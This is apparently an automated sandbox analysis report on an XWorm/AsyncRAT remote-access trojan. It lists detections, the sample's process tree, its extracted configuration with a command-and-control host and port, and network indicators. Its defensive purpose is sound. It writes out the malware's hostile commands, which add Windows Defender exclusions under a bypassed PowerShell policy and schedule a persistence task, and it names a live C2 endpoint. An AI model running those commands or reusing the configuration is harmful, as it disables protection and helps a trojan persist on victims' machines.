
Windows Analysis Report
aZDwfEKorn.exe

Overview

General Information

Sample name: aZDwfEKorn.exe
renamed because original name is a hash value
Original sample name: 803c3419bd5a171884ff51f1d75ce521a505e817fd42f1d52ac0de3c33f6dfca.exe
Analysis ID: 1575207
MD5: cc052d76ffa12621e3a1faac9a71aa2a
SHA1: 0700e214d49944a83a141dbb5c982bbf8efe2d3f
SHA256: 803c3419bd5a171884ff51f1d75ce521a505e817fd42f1d52ac0de3c33f6dfca
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • aZDwfEKorn.exe (PID: 5900 cmdline: "C:\Users\user\Desktop\aZDwfEKorn.exe" MD5: CC052D76FFA12621E3A1FAAC9A71AA2A)
    • powershell.exe (PID: 5408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aZDwfEKorn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boost' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7944 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • boost (PID: 8088 cmdline: C:\Users\user\AppData\Roaming\boost MD5: CC052D76FFA12621E3A1FAAC9A71AA2A)
  • OpenWith.exe (PID: 5200 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OpenWith.exe (PID: 1272 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • boost (PID: 1532 cmdline: C:\Users\user\AppData\Roaming\boost MD5: CC052D76FFA12621E3A1FAAC9A71AA2A)
  • cleanup
{"C2 url": ["audio-clouds.gl.at.ply.gg"], "Port": 28408, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings
aZDwfEKorn.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
aZDwfEKorn.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x87a4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8841:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8956:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x841c:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\boost | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\boost | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x87a4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8841:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8956:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x841c:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x85a4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8641:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8756:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x821c:$cnc4: POST / HTTP/1.1
Process Memory Space: aZDwfEKorn.exe PID: 5900 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
0.0.aZDwfEKorn.exe.d30000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.aZDwfEKorn.exe.d30000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x87a4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8841:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8956:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x841c:$cnc4: POST / HTTP/1.1

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aZDwfEKorn.exe", ParentImage: C:\Users\user\Desktop\aZDwfEKorn.exe, ParentProcessId: 5900, ParentProcessName: aZDwfEKorn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', ProcessId: 5408, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aZDwfEKorn.exe", ParentImage: C:\Users\user\Desktop\aZDwfEKorn.exe, ParentProcessId: 5900, ParentProcessName: aZDwfEKorn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', ProcessId: 5408, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\boost, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\aZDwfEKorn.exe, ProcessId: 5900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boost
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\boost, CommandLine: C:\Users\user\AppData\Roaming\boost, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\boost, NewProcessName: C:\Users\user\AppData\Roaming\boost, OriginalFileName: C:\Users\user\AppData\Roaming\boost, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user\AppData\Roaming\boost, ProcessId: 8088, ProcessName: boost
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aZDwfEKorn.exe", ParentImage: C:\Users\user\Desktop\aZDwfEKorn.exe, ParentProcessId: 5900, ParentProcessName: aZDwfEKorn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', ProcessId: 5408, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\aZDwfEKorn.exe, ProcessId: 5900, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boost.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\aZDwfEKorn.exe", ParentImage: C:\Users\user\Desktop\aZDwfEKorn.exe, ParentProcessId: 5900, ParentProcessName: aZDwfEKorn.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost", ProcessId: 7944, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aZDwfEKorn.exe", ParentImage: C:\Users\user\Desktop\aZDwfEKorn.exe, ParentProcessId: 5900, ParentProcessName: aZDwfEKorn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', ProcessId: 5408, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1476, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T18:53:51.009659+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49887 | 147.185.221.24 | 28408 | TCP

AV Detection

Source: aZDwfEKorn.exe | Avira: detected
Source: audio-clouds.gl.at.ply.gg | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\boost | Avira: detection malicious, Label: TR/Spy.Gen
Source: aZDwfEKorn.exe | Malware Configuration Extractor: Xworm {"C2 url": ["audio-clouds.gl.at.ply.gg"], "Port": 28408, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Roaming\boost | ReversingLabs: Detection: 81%
Source: aZDwfEKorn.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\boost | Joe Sandbox ML: detected
Source: aZDwfEKorn.exe | Joe Sandbox ML: detected
Source: aZDwfEKorn.exe | String decryptor: audio-clouds.gl.at.ply.gg
Source: aZDwfEKorn.exe | String decryptor: 28408
Source: aZDwfEKorn.exe | String decryptor: <123456789>
Source: aZDwfEKorn.exe | String decryptor: <Xwormmm>
Source: aZDwfEKorn.exe | String decryptor: f9t group
Source: aZDwfEKorn.exe | String decryptor: USB.exe
Source: aZDwfEKorn.exe | String decryptor: %AppData%
Source: aZDwfEKorn.exe | String decryptor: boost
Source: aZDwfEKorn.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: aZDwfEKorn.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49887 -> 147.185.221.24:28408
Source: Malware configuration extractor | URLs: audio-clouds.gl.at.ply.gg
Source: global traffic | TCP traffic: 192.168.2.7:49826 -> 147.185.221.24:28408
Source: Joe Sandbox View | IP Address: 147.185.221.24
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: audio-clouds.gl.at.ply.gg
Source: powershell.exe, 00000007.00000002.1367393487.000001A12C853000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m:t
Source: powershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: svchost.exe, 00000018.00000002.2528359798.000002A272A84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: qmgr.db.24.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.24.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.24.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.24.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.24.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.24.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.24.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000007.00000002.1360053265.000001A1240F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1442850240.000002979D871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1629972370.00000225E979E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1342572886.000001A1142A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978DA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D995A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1342572886.000001A114081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978D801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D9731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F4D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1342572886.000001A1142A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978DA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D995A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.1366608931.000001A12C706000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1931766181.0000027827A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000010.00000002.1935684002.0000027827BA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000007.00000002.1342572886.000001A114081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978D801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D9731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F4D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: edb.log.24.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000018.00000003.2075055763.000002A272920000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.dr, edb.log.24.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.1360053265.000001A1240F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1442850240.000002979D871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1629972370.00000225E979E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.24.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: aZDwfEKorn.exe, XLogger.cs | .Net Code: KeyboardLayout
Source: boost.0.dr, XLogger.cs | .Net Code: KeyboardLayout

Operating System Destruction

Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Process information set: 01 00 00 00

System Summary

Source: aZDwfEKorn.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.aZDwfEKorn.exe.d30000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\boost, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Code function: 0_2_00007FFAAC587D76
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Code function: 0_2_00007FFAAC5812B9
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Code function: 0_2_00007FFAAC588B22
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Code function: 0_2_00007FFAAC580F10
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Code function: 0_2_00007FFAAC581C4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFAAC6730E9
Source: C:\Users\user\AppData\Roaming\boost | Code function: 22_2_00007FFAAC5A12B9
Source: C:\Users\user\AppData\Roaming\boost | Code function: 22_2_00007FFAAC5A1C4D
Source: C:\Users\user\AppData\Roaming\boost | Code function: 26_2_00007FFAAC5812B9
Source: C:\Users\user\AppData\Roaming\boost | Code function: 26_2_00007FFAAC581C4D
Source: aZDwfEKorn.exe, 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameLoad.exe4 vs aZDwfEKorn.exe
Source: aZDwfEKorn.exe | Binary or memory string: OriginalFilenameLoad.exe4 vs aZDwfEKorn.exe
Source: aZDwfEKorn.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: aZDwfEKorn.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.aZDwfEKorn.exe.d30000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\boost, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: aZDwfEKorn.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: aZDwfEKorn.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: aZDwfEKorn.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: boost.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: boost.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: boost.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: aZDwfEKorn.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: aZDwfEKorn.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: boost.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: boost.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@21/25@1/2
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | File created: C:\Users\user\AppData\Roaming\boost
Source: C:\Users\user\AppData\Roaming\boost | Mutant created: NULL
